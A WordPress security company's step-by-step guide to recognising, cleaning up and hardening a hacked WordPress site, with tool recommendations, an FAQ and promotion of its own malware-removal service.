Finding out your WordPress site has been hacked is one of the worst feelings a website owner can experience. Your stomach drops. Questions start racing: How long has this been going on? Have my customers been affected? Is my data gone? If you’re in this situation right now and searching for what to do when your WordPress site is hacked, take a breath. This guide will walk you through every step clearly and in the right order.
The good news is that a hacked WordPress site is not necessarily a permanent disaster. With the right approach, most hacked sites can be fully cleaned, restored, and hardened against future attacks. The bad news is that time matters. Every hour your site remains compromised, the damage can deepen: more files infected, more visitors exposed, more SEO equity destroyed. So let’s get moving.
How to Tell If Your WordPress Site Has Been Hacked
Sometimes a hack is obvious. Your homepage has been defaced with a hacker’s message, or your site is redirecting visitors to a spam or adult website. But many WordPress hacks are designed to be invisible to the site owner while actively causing damage to your visitors and your search rankings. Here are the signs your WordPress site has been hacked to watch for:
- Your site is redirecting to a different website. Visitors land on your domain and get immediately sent to a spam, pharmaceutical, or adult site. You might not see this yourself if the redirect is targeted at specific devices, browsers, or visitors coming from Google search results.
- Google has flagged your site. You see a “This site may be hacked” warning in Google search results, or Chrome displays a “Deceptive site ahead” red warning page when visitors try to access your site.
- Your hosting provider has suspended your account. Many hosting providers automatically scan for malware and will suspend accounts that are actively distributing it. An unexpected suspension is often the first sign of a serious infection.
- You see unfamiliar admin users in WordPress. Check your Users section in the WordPress dashboard. Unknown administrator accounts are a strong indicator that someone has gained unauthorized access to your site.
- Your site suddenly has new pages or posts you didn’t create. Hackers often inject spammy pages optimized for pharmaceutical keywords, gambling, or counterfeit goods directly into your WordPress database to exploit your site’s existing SEO authority.
- Google Search Console is showing security warnings. If you have your site connected to Google Search Console, check the Security Issues report. Google actively scans indexed sites for malware and phishing content and reports what it finds.
- Your site has slowed down dramatically without explanation. Some malware runs resource-intensive processes in the background, such as sending spam email or participating in a botnet, which can make your site noticeably slower.
- Visitors or customers are contacting you about strange behavior. Reports of unexpected pop-ups, download prompts, or security warnings from your visitors are a serious signal that something is wrong.
If you’re seeing any of these signs, treat it as a confirmed compromise and start working through the steps below immediately.
Step 1: Don’t Panic, But Act Fast
The worst thing you can do right now is start making random changes out of panic. Deleting files without understanding what they do, resetting your database without taking a backup, or restoring from an old backup without checking if it’s clean can all make the situation worse. Stay calm, work methodically, and follow the steps in order.
At the same time, don’t delay. Every additional hour of an active infection increases the risk that:
- More files across your site become infected.
- Google deepens its blacklist against your domain, extending the time needed for SEO recovery.
- Visitor data is exposed or your domain is used to send phishing emails, damaging your email reputation.
- Your hosting provider escalates the suspension or terminates your account entirely.
If you are not comfortable handling a WordPress security incident yourself, skipping to professional help is a completely valid choice and often the faster, safer route. Our WordPress malware removal service is specifically designed for this situation: fast, thorough, and handled by people who do this regularly.
Step 2: Put Your Site Into Maintenance Mode
Before you do anything else, take your site offline or put it into maintenance mode. This stops new visitors from being exposed to malware, phishing content, or malicious redirects while you work on cleaning the infection.
If you still have access to your WordPress dashboard, install and activate a maintenance mode plugin like Coming Soon Page and Maintenance Mode by SeedProd. If your dashboard access has been locked out by the attacker, contact your hosting provider and ask them to temporarily block public access to your site at the server level while you work on the cleanup.
Step 3: Change All of Your Passwords Immediately
Before you clean a single infected file, change every password associated with your WordPress site. If you clean the malware without changing credentials, the attacker can simply log back in and reinfect everything.
Change passwords for:
- All WordPress admin accounts, especially any you don’t recognize (delete unknown admin accounts entirely).
- Your hosting control panel account (cPanel, Plesk, or your managed hosting dashboard).
- Your FTP or SFTP credentials.
- Your database password in both your hosting panel and your wp-config.php file (these must match).
- Your domain registrar account, since some sophisticated attackers will attempt to transfer or redirect your domain.
- Any email accounts associated with your WordPress admin or hosting accounts.
Use long, unique, randomly generated passwords for all of these. A password manager like Bitwarden or 1Password makes this manageable. While you’re at it, enable two-factor authentication on your WordPress admin and hosting panel if it isn’t already active.
Step 4: Scan Your Site for Malware
Now that credentials are secured, you need to understand the full scope of the infection. There are two approaches here: scanning from inside WordPress using a plugin, and scanning from outside using a remote scanner.
Scanning with a WordPress security plugin
Wordfence Security is the most widely used WordPress malware scanner and has a solid free tier. After installing and activating it, run a full scan. Wordfence will compare your WordPress core files, plugins, and themes against the known clean versions in the WordPress repository and flag any files that have been modified, added, or deleted unexpectedly.
MalCare is another strong option. Unlike Wordfence, which scans on your server (which can be slow and resource-heavy on a compromised site), MalCare runs its deep scanning on external servers. This makes it less likely to trigger hosting suspensions during the scan process and often finds infections that server-side scanners miss.
Scanning with a remote scanner
Sucuri’s SiteCheck tool at sitecheck.sucuri.net will scan your site’s publicly visible output for known malware signatures, blacklist status across major security databases (Google Safe Browsing, McAfee, Norton, and others), and indicators of server-side compromise. It’s free, runs in your browser, and takes about 60 seconds.
Document everything the scanners find. You’ll need this information to guide the cleanup in the next step.
Step 5: Take a Backup of the Compromised Site
This might seem counterintuitive. Why back up a hacked site? Because before you make any changes, you want a snapshot of the current state. If the cleanup goes wrong, if files get deleted that shouldn’t have been, or if the database is accidentally corrupted during the process, you need a fallback. An infected backup is better than no backup at all, as long as you know it’s infected and treat it accordingly.
Take a full backup via your hosting panel or FTP, label it clearly as “infected,” and store it somewhere separate from your hosting environment. Then proceed to the cleanup.
Step 6: Clean the Infection
This is the most technically demanding part of the process. WordPress malware cleanup involves several distinct tasks, and they need to be done thoroughly. Partial cleanup is one of the most common reasons sites get reinfected within days of an apparent recovery.
Remove unknown admin accounts
In your WordPress dashboard under Users, delete any administrator accounts you don’t recognize. If you can’t access your dashboard, you can do this directly in your database via phpMyAdmin by checking the wp_users and wp_usermeta tables.
Reinstall WordPress core files
Download a fresh copy of WordPress from WordPress.org and replace all core files. The folders to replace are /wp-admin/ and /wp-includes/ entirely, along with all individual files in the root directory (but not wp-config.php, which contains your database credentials, and not the /wp-content/ folder, which contains your themes, plugins, and uploads). This wipes out any malware that has been injected into core WordPress files.
Reinstall all plugins and themes from clean sources
Delete all plugins and reinstall them fresh from the WordPress plugin repository or from the original developer. Do the same for your theme. Never reinstall from files that were on the compromised server, as they may still carry the infection. This is also a good time to remove any plugins or themes you weren’t actively using.
Be especially wary of nulled or pirated WordPress plugins and themes. These are among the most common vectors for WordPress infections because they often come pre-loaded with backdoors that allow attackers persistent access to your site regardless of how many times you clean the visible malware.
Clean your uploads folder
The /wp-content/uploads/ folder cannot be replaced wholesale because it contains your media files. Go through this folder (via FTP or your hosting file manager) and look for any PHP files. There should be no PHP files in your uploads folder under any normal circumstances. Any you find are almost certainly malicious backdoors and should be deleted immediately.
Clean your database
Malware is often injected directly into your WordPress database: into post content, widget settings, option values in wp_options, or user metadata. Look for suspicious patterns like base64-encoded strings (long strings of random-looking characters), injected JavaScript tags (especially in places where JavaScript has no business being, like post content or site title), and unfamiliar URLs embedded in option values.
The Wordfence scanner will flag database infections. MalCare’s cleanup feature can remove them automatically. If you’re doing this manually, approach database editing with caution and always have that infected backup available as a reference.
Step 7: Check and Update Your wp-config.php and .htaccess Files
Two files are frequent targets for malicious modification: wp-config.php and .htaccess.
Compare your wp-config.php against a fresh WordPress install. It should only contain your database credentials, table prefix, secret keys (which you should regenerate using the WordPress secret key generator), and a small number of defined constants. Any additional code blocks are suspicious.
Your .htaccess file in the root of your WordPress install should contain only the standard WordPress permalink rewrite rules. Malicious redirects are very commonly hidden in .htaccess. Delete the file entirely and regenerate it from WordPress by going to Settings, then Permalinks, and clicking Save Changes.
Step 8: Request a Google Review to Remove the Blacklist Warning
If Google flagged your site during the infection, your site will continue showing security warnings in search results and in Chrome until you specifically request a review through Google Search Console. This does not happen automatically, even after your site is clean.
In Google Search Console, go to Security and Manual Actions, then Security Issues. Review the issues Google detected, confirm your site is now clean, and click Request Review. Google typically processes these reviews within one to three days for malware cases, though it can occasionally take longer depending on the severity of the original infection.
If your site was blacklisted by other security databases (Sucuri’s SiteCheck will tell you which ones), each has its own removal request process. The most important ones to address are Google Safe Browsing (handled through Google Search Console), McAfee WebAdvisor, and Norton Safe Web.
Step 9: Harden Your WordPress Site Against Future Attacks
Cleaning a hack without hardening the site is like patching a hole in a fence but leaving the gate wide open. Once you’re clean, implement these protections before bringing your site back online:
- Update everything. WordPress core, all plugins, and all themes should be on their latest versions. Outdated software is the single most common entry point for WordPress attackers.
- Enable two-factor authentication on all WordPress admin accounts. Wordfence, WP 2FA, and several other plugins make this straightforward to implement.
- Limit login attempts. Brute force attacks against the WordPress login page are relentless. A plugin like Limit Login Attempts Reloaded or the login protection built into Wordfence will block IP addresses after a defined number of failed attempts.
- Disable XML-RPC if you’re not using it. This WordPress feature is a frequent target for brute force and DDoS amplification attacks. Unless you specifically need it for a mobile app or remote publishing workflow, it should be disabled.
- Move your WordPress login page. Changing the default /wp-admin/ URL to something less predictable dramatically reduces automated bot login attempts.
- Install a WordPress firewall. Wordfence and Sucuri both offer web application firewall (WAF) functionality that blocks malicious requests before they reach your WordPress installation. Cloudflare’s free plan also includes basic firewall protection at the DNS level.
- Set up automated backups to an off-site location. If the worst happens again, you want a clean backup you can restore from quickly. UpdraftPlus with remote storage (Google Drive, Dropbox, or Amazon S3) is a solid free solution.
- Audit your user accounts regularly. Review your WordPress user list every few months and remove any accounts that are no longer needed.
How Long Does WordPress Malware Removal Take?
For a straightforward infection on a small site with a clean backup available, a confident WordPress user can work through the steps above in three to six hours. For larger sites, complex infections involving database manipulation, or cases where the initial entry point needs to be identified and closed, the process can take a full day or more.
Professional WordPress malware removal is typically faster because experienced technicians have seen the same infection patterns repeatedly and know exactly where to look. At The Beard Guy LLC, our WordPress malware removal service includes a full site scan, complete infection cleanup, security hardening, and a Google blacklist removal request, so your site comes back clean and protected, not just temporarily patched.
Frequently Asked Questions
Can I just restore from a backup instead of cleaning the hack?
Restoring from a backup can be a valid approach, but only if you have a confirmed clean backup from before the infection occurred, and only if you also identify and close the vulnerability that allowed the attacker in. Restoring to a vulnerable state without patching the entry point will result in reinfection, often within hours. If your most recent clean backup is months old, you may also lose significant content and data.
Will my SEO recover after a WordPress hack?
Yes, in most cases, but the timeline depends on how long the infection was active and how severely Google reacted to it. Once your site is clean and you’ve submitted a review request through Google Search Console, rankings typically begin recovering within two to four weeks. Sites that were infected for months or that were used for serious spam campaigns may take longer to fully recover their search visibility.
How did my WordPress site get hacked?
The most common entry points for WordPress attacks are: outdated plugins or themes with known vulnerabilities, weak or reused passwords on admin accounts, nulled or pirated plugins and themes with pre-installed backdoors, insecure hosting environments with poor file permission configurations, and brute force attacks on the WordPress login page. Running a post-cleanup audit to identify which vulnerability was exploited is an important step that many site owners skip.
Do I need to notify my customers if my WordPress site was hacked?
This depends on what data your site holds and what the hackers accessed. If your site collects customer data (names, email addresses, payment information, or any other personally identifiable information) and there is any reason to believe that data was accessed or exfiltrated, you may have legal obligations to notify affected users depending on your jurisdiction. In the EU, GDPR requires notification within 72 hours of becoming aware of a breach that poses a risk to individuals. In the US, notification requirements vary by state. When in doubt, consult a legal professional.
How much does WordPress malware removal cost?
DIY cleanup costs nothing in money but can cost significant time and carries the risk of incomplete cleanup. Professional WordPress malware removal services typically range from $150 to $500 or more depending on the severity of the infection and the size of the site. The investment is almost always worth it compared to the ongoing damage of a partially cleaned or reinfected site.
How can I prevent my WordPress site from getting hacked again?
The most effective prevention stack is: keep all software updated at all times, use strong unique passwords and two-factor authentication on all admin accounts, install a WordPress web application firewall, run automated malware scans on a regular schedule, and keep tested off-site backups. If you’re on a managed WordPress hosting plan that includes security monitoring and managed updates, the most common attack vectors are already covered for you.
The Bottom Line
A hacked WordPress site is a crisis, but it’s a manageable one if you respond quickly and systematically. Work through the steps in this guide in order, don’t skip the hardening phase after cleanup, and don’t restore from an old backup without also closing the vulnerability that let the attacker in.
If you’d rather have someone else handle it, that’s a smart call. The faster a WordPress hack is professionally cleaned, the less total damage it causes to your rankings, your visitors, and your reputation. Our WordPress malware removal service gets your site clean, protected, and back online as quickly as possible. Get in touch and we’ll get started right away.
